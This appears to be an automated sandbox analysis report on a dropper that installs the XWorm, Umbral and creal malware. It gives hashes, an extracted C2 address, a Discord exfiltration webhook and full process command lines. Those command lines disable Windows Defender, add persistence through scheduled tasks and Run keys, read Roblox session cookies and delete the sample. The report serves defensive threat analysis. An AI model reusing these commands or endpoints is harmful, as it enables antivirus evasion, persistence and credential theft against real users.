Analysis
-
max time kernel
148s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
09-05-2024 06:52
Static task
static1
Behavioral task
behavioral1
Sample
XBinderOutput2.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
XBinderOutput2.exe
Resource
win10v2004-20240426-en
General
-
Target
XBinderOutput2.exe
-
Size
17.8MB
-
MD5
a8cda1e3a11a63a5100710ebae243fc3
-
SHA1
576b05edb98b7a876d718cf68431829cb3fa9de6
-
SHA256
821af9552ad85d2d62532f2d93e8c16f7630aeddbbdc9cbe0c567ea7dbf784fa
-
SHA512
63c3f941a1ee1d6394c2ec47c6a4c9965e6c52432a2139e26a330b249dec2edc18818f37c758e52b6b18f1b836aa31e87eccaa93af72ee91fcbc03a0dd15f3e0
-
SSDEEP
393216:SQafHC7YYWipbNd1u1xMe7nW3xKHJ0Z+HkkmyRG4:NafC7Y4BNd1u1xZ7W3x80AA1
Malware Config
Extracted
xworm
our-sole.gl.at.ply.gg:46907
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
umbral
https://discord.com/api/webhooks/1236611629903380501/oT2tsAnrV_nKS_jRzm9Dp__bJxe9t_Ww5HM_1B2JjBrixMsDcr3JT5wfaEqHWCedkawt
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0037000000015c9b-14.dat family_umbral behavioral1/memory/2568-15-0x00000000010D0000-0x0000000001110000-memory.dmp family_umbral -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/files/0x000c00000001228a-6.dat family_xworm behavioral1/memory/2984-11-0x0000000000DE0000-0x0000000000DFA000-memory.dmp family_xworm behavioral1/memory/2232-274-0x0000000000010000-0x000000000002A000-memory.dmp family_xworm behavioral1/memory/2996-278-0x0000000000CF0000-0x0000000000D0A000-memory.dmp family_xworm behavioral1/memory/1576-280-0x0000000001100000-0x000000000111A000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2116 powershell.exe 1200 powershell.exe 2228 powershell.exe 2972 powershell.exe 1568 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClien1t.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClien1t.exe -
Executes dropped EXE 8 IoCs
pid Process 2984 XClien1t.exe 2568 Umbral.exe 2832 creal.exe 2724 creal.exe 1152 Process not Found 2232 XClient.exe 2996 XClient.exe 1576 XClient.exe -
Loads dropped DLL 3 IoCs
pid Process 3028 XBinderOutput2.exe 2832 creal.exe 2724 creal.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClien1t.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0038000000015ca9-18.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2656 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3028 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1732 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2116 powershell.exe 2568 Umbral.exe 1200 powershell.exe 2228 powershell.exe 556 powershell.exe 2972 powershell.exe 768 powershell.exe 1568 powershell.exe 984 powershell.exe 2984 XClien1t.exe 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2984 XClien1t.exe Token: SeDebugPrivilege 2568 Umbral.exe Token: SeIncreaseQuotaPrivilege 1432 wmic.exe Token: SeSecurityPrivilege 1432 wmic.exe Token: SeTakeOwnershipPrivilege 1432 wmic.exe Token: SeLoadDriverPrivilege 1432 wmic.exe Token: SeSystemProfilePrivilege 1432 wmic.exe Token: SeSystemtimePrivilege 1432 wmic.exe Token: SeProfSingleProcessPrivilege 1432 wmic.exe Token: SeIncBasePriorityPrivilege 1432 wmic.exe Token: SeCreatePagefilePrivilege 1432 wmic.exe Token: SeBackupPrivilege 1432 wmic.exe Token: SeRestorePrivilege 1432 wmic.exe Token: SeShutdownPrivilege 1432 wmic.exe Token: SeDebugPrivilege 1432 wmic.exe Token: SeSystemEnvironmentPrivilege 1432 wmic.exe Token: SeRemoteShutdownPrivilege 1432 wmic.exe Token: SeUndockPrivilege 1432 wmic.exe Token: SeManageVolumePrivilege 1432 wmic.exe Token: 33 1432 wmic.exe Token: 34 1432 wmic.exe Token: 35 1432 wmic.exe Token: SeIncreaseQuotaPrivilege 1432 wmic.exe Token: SeSecurityPrivilege 1432 wmic.exe Token: SeTakeOwnershipPrivilege 1432 wmic.exe Token: SeLoadDriverPrivilege 1432 wmic.exe Token: SeSystemProfilePrivilege 1432 wmic.exe Token: SeSystemtimePrivilege 1432 wmic.exe Token: SeProfSingleProcessPrivilege 1432 wmic.exe Token: SeIncBasePriorityPrivilege 1432 wmic.exe Token: SeCreatePagefilePrivilege 1432 wmic.exe Token: SeBackupPrivilege 1432 wmic.exe Token: SeRestorePrivilege 1432 wmic.exe Token: SeShutdownPrivilege 1432 wmic.exe Token: SeDebugPrivilege 1432 wmic.exe Token: SeSystemEnvironmentPrivilege 1432 wmic.exe Token: SeRemoteShutdownPrivilege 1432 wmic.exe Token: SeUndockPrivilege 1432 wmic.exe Token: SeManageVolumePrivilege 1432 wmic.exe Token: 33 1432 wmic.exe Token: 34 1432 wmic.exe Token: 35 1432 wmic.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe Token: SeDebugPrivilege 556 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeDebugPrivilege 1568 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeIncreaseQuotaPrivilege 2100 wmic.exe Token: SeSecurityPrivilege 2100 wmic.exe Token: SeTakeOwnershipPrivilege 2100 wmic.exe Token: SeLoadDriverPrivilege 2100 wmic.exe Token: SeSystemProfilePrivilege 2100 wmic.exe Token: SeSystemtimePrivilege 2100 wmic.exe Token: SeProfSingleProcessPrivilege 2100 wmic.exe Token: SeIncBasePriorityPrivilege 2100 wmic.exe Token: SeCreatePagefilePrivilege 2100 wmic.exe Token: SeBackupPrivilege 2100 wmic.exe Token: SeRestorePrivilege 2100 wmic.exe Token: SeShutdownPrivilege 2100 wmic.exe Token: SeDebugPrivilege 2100 wmic.exe Token: SeSystemEnvironmentPrivilege 2100 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2984 XClien1t.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2984 3028 XBinderOutput2.exe 28 PID 3028 wrote to memory of 2984 3028 XBinderOutput2.exe 28 PID 3028 wrote to memory of 2984 3028 XBinderOutput2.exe 28 PID 3028 wrote to memory of 2568 3028 XBinderOutput2.exe 29 PID 3028 wrote to memory of 2568 3028 XBinderOutput2.exe 29 PID 3028 wrote to memory of 2568 3028 XBinderOutput2.exe 29 PID 3028 wrote to memory of 2832 3028 XBinderOutput2.exe 30 PID 3028 wrote to memory of 2832 3028 XBinderOutput2.exe 30 PID 3028 wrote to memory of 2832 3028 XBinderOutput2.exe 30 PID 2832 wrote to memory of 2724 2832 creal.exe 31 PID 2832 wrote to memory of 2724 2832 creal.exe 31 PID 2832 wrote to memory of 2724 2832 creal.exe 31 PID 2984 wrote to memory of 2116 2984 XClien1t.exe 33 PID 2984 wrote to memory of 2116 2984 XClien1t.exe 33 PID 2984 wrote to memory of 2116 2984 XClien1t.exe 33 PID 2568 wrote to memory of 1432 2568 Umbral.exe 35 PID 2568 wrote to memory of 1432 2568 Umbral.exe 35 PID 2568 wrote to memory of 1432 2568 Umbral.exe 35 PID 2568 wrote to memory of 2088 2568 Umbral.exe 37 PID 2568 wrote to memory of 2088 2568 Umbral.exe 37 PID 2568 wrote to memory of 2088 2568 Umbral.exe 37 PID 2568 wrote to memory of 1200 2568 Umbral.exe 39 PID 2568 wrote to memory of 1200 2568 Umbral.exe 39 PID 2568 wrote to memory of 1200 2568 Umbral.exe 39 PID 2984 wrote to memory of 2228 2984 XClien1t.exe 41 PID 2984 wrote to memory of 2228 2984 XClien1t.exe 41 PID 2984 wrote to memory of 2228 2984 XClien1t.exe 41 PID 2568 wrote to memory of 556 2568 Umbral.exe 43 PID 2568 wrote to memory of 556 2568 Umbral.exe 43 PID 2568 wrote to memory of 556 2568 Umbral.exe 43 PID 2984 wrote to memory of 2972 2984 XClien1t.exe 45 PID 2984 wrote to memory of 2972 2984 XClien1t.exe 45 PID 2984 wrote to memory of 2972 2984 XClien1t.exe 45 PID 2984 wrote to memory of 1568 2984 XClien1t.exe 47 PID 2984 wrote to memory of 1568 2984 XClien1t.exe 47 PID 2984 wrote to memory of 1568 2984 XClien1t.exe 47 PID 2568 wrote to memory of 768 2568 Umbral.exe 49 PID 2568 wrote to memory of 768 2568 Umbral.exe 49 PID 2568 wrote to memory of 768 2568 Umbral.exe 49 PID 2568 wrote to memory of 984 2568 Umbral.exe 51 PID 2568 wrote to memory of 984 2568 Umbral.exe 51 PID 2568 wrote to memory of 984 2568 Umbral.exe 51 PID 2568 wrote to memory of 2100 2568 Umbral.exe 53 PID 2568 wrote to memory of 2100 2568 Umbral.exe 53 PID 2568 wrote to memory of 2100 2568 Umbral.exe 53 PID 2568 wrote to memory of 2244 2568 Umbral.exe 55 PID 2568 wrote to memory of 2244 2568 Umbral.exe 55 PID 2568 wrote to memory of 2244 2568 Umbral.exe 55 PID 2568 wrote to memory of 2748 2568 Umbral.exe 57 PID 2568 wrote to memory of 2748 2568 Umbral.exe 57 PID 2568 wrote to memory of 2748 2568 Umbral.exe 57 PID 2984 wrote to memory of 2656 2984 XClien1t.exe 59 PID 2984 wrote to memory of 2656 2984 XClien1t.exe 59 PID 2984 wrote to memory of 2656 2984 XClien1t.exe 59 PID 2568 wrote to memory of 2652 2568 Umbral.exe 61 PID 2568 wrote to memory of 2652 2568 Umbral.exe 61 PID 2568 wrote to memory of 2652 2568 Umbral.exe 61 PID 2568 wrote to memory of 3028 2568 Umbral.exe 63 PID 2568 wrote to memory of 3028 2568 Umbral.exe 63 PID 2568 wrote to memory of 3028 2568 Umbral.exe 63 PID 2568 wrote to memory of 2920 2568 Umbral.exe 65 PID 2568 wrote to memory of 2920 2568 Umbral.exe 65 PID 2568 wrote to memory of 2920 2568 Umbral.exe 65 PID 2920 wrote to memory of 1732 2920 cmd.exe 67 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2088 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\XBinderOutput2.exe"C:\Users\Admin\AppData\Local\Temp\XBinderOutput2.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\XClien1t.exe"C:\Users\Admin\AppData\Local\Temp\XClien1t.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClien1t.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClien1t.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"3⤵
- Creates scheduled task(s)
PID:2656
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2244
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2652
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3028
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:1732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2724
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1E21D5C9-26CC-474E-8698-C19581DB3524} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵PID:1560
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵
- Executes dropped EXE
PID:2232
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵
- Executes dropped EXE
PID:2996
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵
- Executes dropped EXE
PID:1576
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
227KB
MD562b9b8b0309816ce14052004cef1e777
SHA19d5f3e8d7e9bad1eeba073343a1fcd204cee78b4
SHA25685675e6c15174945a97a8ff63468c38f99c4d9c81b7f92a5200b4438c8d16c1f
SHA512ff9551fa639bded19d960d4251b334a5114a4a3fcce2d8091df8d1d12609cd361ea15e3a63f4544e2d9a64012bed60f9b5eb99aec491a59c5d68c26912615778
-
Filesize
80KB
MD52ff966edfc4396ba69a99e3328045fdf
SHA179ca230b7c6525753d573ee2fb9bba998f620e81
SHA256b30c162dbfcee84db22269812ebe2e690ca45936baeb862c0614bb67233b23c3
SHA512270fe10d34affd2e6ae3becd01ec6786c3f07cec191baf7607117863e7deaf38d512cdaa66fa85e6b4f4cc13275acdaa64c36c587c30e6e1be6549f0d8bde9f9
-
Filesize
5.5MB
MD565e381a0b1bc05f71c139b0c7a5b8eb2
SHA17c4a3adf21ebcee5405288fc81fc4be75019d472
SHA25653a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA5124db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f6cac0ed411d494c8fdda42b960f941d
SHA15f04c7427883de03accf5018f471012c5294c76e
SHA25613126e189e680027d25fa909ddabde07bdd2ef649db2185cbcb2b82974f5fd95
SHA512b02273c9657a39c479ca52ff3094adcd5c8e0b3256bf874a946446d2a80ee5c11882e363eb40ff5568b47952ad4e3ee4e814355cda1700f763cc467857eedb2c
-
Filesize
17.9MB
MD5011de9cc41adb4134268ef5f78c3b9bd
SHA11856d8b78da864339cacf55a9f3b08e59277a58f
SHA25685403f67f316d17dd262326c00d840cd44f3e602ef7e5ccf74978ec321a4cc70
SHA512fc6e52a50c302cfb9df55262e7c599cff43a977c29900310249ba81c13cc0d2ee81c21d4c078eff9a262a0c9f91e69a02a0cbfa2556470b708accee51aa958dd